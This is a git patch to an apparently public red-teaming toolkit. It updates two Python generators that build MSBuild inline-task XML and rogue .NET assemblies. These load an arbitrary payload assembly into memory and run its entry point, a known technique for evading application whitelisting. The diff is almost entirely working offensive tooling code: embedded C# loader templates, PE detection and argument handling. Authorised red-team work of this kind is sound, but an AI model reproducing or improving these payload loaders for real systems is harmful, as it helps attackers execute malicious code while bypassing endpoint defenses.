From 01e2fa3643f28dd217420be4dbd852bcdbd1efd8 Mon Sep 17 00:00:00 2001
From: mgeeky <mb@binary-offensive.com>
Date: Wed, 20 Jan 2021 09:24:47 -0800
Subject: [PATCH] Updated generateMSBuildXML.py and generateRogueDotNet.py

---
 red-teaming/generateMSBuildXML.py             | 44 +++++++++----------
 .../rogue-dot-net/generateRogueDotNet.py      | 31 +++++--------
 2 files changed, 32 insertions(+), 43 deletions(-)

diff --git a/red-teaming/generateMSBuildXML.py b/red-teaming/generateMSBuildXML.py
index dce0501..2437e25 100644
--- a/red-teaming/generateMSBuildXML.py
+++ b/red-teaming/generateMSBuildXML.py
@@ -22,6 +22,7 @@ import sys
 import gzip
 import base64
 import string
+import pefile
 import struct
 import random
 import binascii
@@ -83,10 +84,16 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
       <Reference Include="System.Management.Automation" />
       <Code Type="Class" Language="cs">
         <![CDATA[       
+            using System.Management.Automation;
+            using System.Management.Automation.Runspaces;
+            using Microsoft.Build.Framework;
+            using Microsoft.Build.Utilities;
+            using System;
+            using System.Diagnostics;
+            using System.Reflection;
+            using System.Runtime.InteropServices;
             using System.IO;
             using System.IO.Compression;
-            using System;
-            using System.Reflection;
             using System.Text;
 
             public class $templateName : Task {
@@ -113,14 +120,15 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
                     Assembly asm = Assembly.Load(payload);
                     MethodInfo method = asm.EntryPoint;
                     object instance = asm.CreateInstance(method.Name);
-                    method.Invoke(instance, null); 
+                    method.Invoke(instance, new object[] { new string[] { } }); 
                     return true;
                 }                                
             }           
         ]]>
       </Code>
     </Task>''').safe_substitute(
-            payloadCode = payloadCode
+            payloadCode = payloadCode,
+            templateName = templateName
         )
 
         launchCode = exeLaunchCode
@@ -143,7 +151,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
             using System.Runtime.InteropServices;
             using System.IO;
             using System.IO.Compression;
-           using System.Text;
+            using System.Text;
 
             public class $templateName : Task {
 
@@ -489,26 +497,12 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
     return template
 
 def detectFileIsExe(filePath, forced = False):
-    first1000 = []
-
-    with open(filePath, 'rb') as f:
-        first1000 = f.read()[:1000]
-
-    if not (first1000[0] == 'M' and first1000[1] == 'Z'):
+    try:
+        pe = pefile.PE(filePath)
+        return True
+    except pefile.PEFormatError as e:
         return False
 
-    elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
-
-    if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
-        return False
-
-    dosStub = "This program cannot be run in DOS mode."
-    printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
-
-    #if not dosStub in printables:
-    #    return False
-    return True
-
 def minimize(output):
     output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
     output = output.replace('\n', '')
@@ -601,6 +595,10 @@ def main(argv):
 
     _format = 'powershell'
 
+    if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
+        sys.stderr.write('[?] Input file does not exists.\n\n')
+        return False
+
     if args.exe:
         if not detectFileIsExe(args.inputFile, args.exe):
             sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py
index 8644a2f..0d657da 100644
--- a/red-teaming/rogue-dot-net/generateRogueDotNet.py
+++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py
@@ -47,6 +47,7 @@ import string
 import struct
 import random
 import binascii
+import pefile
 import argparse
 import tempfile
 import subprocess
@@ -236,8 +237,8 @@ def getSourceFileContents(
             Assembly asm = Assembly.Load(payload);
             MethodInfo method = asm.EntryPoint;
             object instance = asm.CreateInstance(method.Name);
-            method.Invoke(instance, null); 
-
+            method.Invoke(instance, new object[] { new string[] { } }); 
+            return true;
         }
 
         ''').safe_substitute(
@@ -662,26 +663,12 @@ $namespaceStop
     return template, templateName
 
 def detectFileIsExe(filePath, forced = False):
-    first1000 = []
-
-    with open(filePath, 'rb') as f:
-        first1000 = f.read()[:1000]
-
-    if not (first1000[0] == 'M' and first1000[1] == 'Z'):
+    try:
+        pe = pefile.PE(filePath)
+        return True
+    except pefile.PEFormatError as e:
         return False
 
-    elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
-
-    if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
-        return False
-
-    dosStub = "This program cannot be run in DOS mode."
-    printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
-
-    #if not dosStub in printables:
-    #    return False
-    return True
-
 
 def opts(argv):
     parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile|cmdline>')
@@ -727,6 +714,10 @@ def main(argv):
 
     _format = 'powershell'
 
+    if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
+        sys.stderr.write('[?] Input file does not exists.\n\n')
+        return False
+
     if args.type not in ['exec', 'run-command']:
       if args.exe:
           if not detectFileIsExe(args.inputFile, args.exe):